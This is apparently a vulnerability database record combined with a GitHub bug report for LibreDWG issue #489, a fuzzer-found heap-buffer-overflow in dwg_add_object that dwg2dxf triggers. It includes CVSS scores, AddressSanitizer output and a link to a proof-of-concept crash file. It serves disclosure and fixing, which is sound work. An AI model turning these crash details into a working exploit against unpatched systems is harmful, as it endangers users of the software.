{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/489" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/489
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==8995==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000ac80 at pc 0x0000004bc125 bp 0x7fffffffc7c0 sp 0x7fffffffbf70 WRITE of size 168 at 0x62e00000ac80 thread T0 #0 0x4bc124 in __asan_memset /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:457 #1 0x5a062e in dwg_add_object /testcase/libredwg/src/decode.c:4740:3 #2 0x7e0942 in dwg_add_VIEW /testcase/libredwg/src/dwg_api.c:24619:3 #3 0x70c71e in decode_preR13_section /testcase/libredwg/src/decode_r11.c:434:13 #4 0x705d7a in decode_preR13 /testcase/libredwg/src/decode_r11.c:834:12 #5 0x53245a in dwg_decode /testcase/libredwg/src/decode.c:209:23 #6 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #7 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #8 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x62e00000ac80 is located 0 bytes to the right of 43136-byte region [0x62e000000400,0x62e00000ac80) allocated by thread T0 here: #0 0x4d2968 in realloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:79 #1 0x70b9ca in decode_preR13_section /testcase/libredwg/src/decode_r11.c:273:32 #2 0x705d7a in decode_preR13 /testcase/libredwg/src/decode_r11.c:834:12 #3 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #4 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #5 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:457 in __asan_memset Shadow bytes around the buggy address: 0x0c5c7fff9540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5c7fff9550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5c7fff9560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5c7fff9570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5c7fff9580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c5c7fff9590:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5c7fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5c7fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5c7fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5c7fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5c7fff95e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8995==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/dwg_add_object_bof
heap-buffer-overflow exists in the function dwg_add_object in decode.c
https://api.github.com/repos/LibreDWG/libredwg/issues/489/comments
3
2022-06-07T01:37:45Z
2022-12-15T08:41:39Z
https://github.com/LibreDWG/libredwg/issues/489
1,262,613,027
489